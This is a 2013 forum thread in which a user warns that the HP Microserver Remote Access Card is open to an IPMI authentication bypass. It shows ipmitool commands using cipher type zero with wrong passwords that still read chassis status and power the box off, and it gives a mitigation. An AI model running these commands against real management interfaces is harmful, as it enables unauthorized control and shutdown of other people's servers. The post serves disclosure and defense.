e4Bkt Posted August 16, 2013 Share Posted August 16, 2013 I registered here just to share this warning. HP recently published a security advisory. Document c03844348. It only mentions servers with iLO hardware, but the Microserver's Remote Access Card (615095-B21) is vulnerable too. The issue is authentication bypass. Anybody can send commands to the box without knowing the password. Firmware 1.2 and 1.3 are both vulnerable. Here's how it works. I'll query the status of the box from a remote linux system using password 'abc' $ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P abc chassis status System Power : on Power Overload : false Power Interlock : inactive Main Power Fault : false Power Control Fault : false Power Restore Policy : always-off Last Power Event : command Chassis Intrusion : inactive Front-Panel Lockout : inactive Drive Fault : false Cooling/Fan Fault : false Cool, the box is on. Should I know that? Can I change that? The correct password is not 'abc' $ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P 123 power off Chassis Power Control: Down/Off I used a different password and didn't get any errors back... $ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P xyz chassis status System Power : off Power Overload : false Power Interlock : inactive Main Power Fault : false Power Control Fault : false Power Restore Policy : always-off Last Power Event : command Chassis Intrusion : inactive Front-Panel Lockout : inactive Drive Fault : false Cooling/Fan Fault : false Crap. Now the box is off. 'abc', '123' and 'xyz' are not the correct password. Setting cyphertype to zero allows complete authentication bypass. Unchecking "enable IPMI over LAN" prevents the problem unless, y'know, you wanted to actually use IPMI for something... 1 Link to comment Share on other sites More sharing options...
Mr_Smartepants Posted August 17, 2013 Share Posted August 17, 2013 Scary. At least they identified it and are working on a fix. Link to comment Share on other sites More sharing options...
ikon Posted August 17, 2013 Share Posted August 17, 2013 Thanks e4Bkt, both for registering and for posting the warning.... very decent of you. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now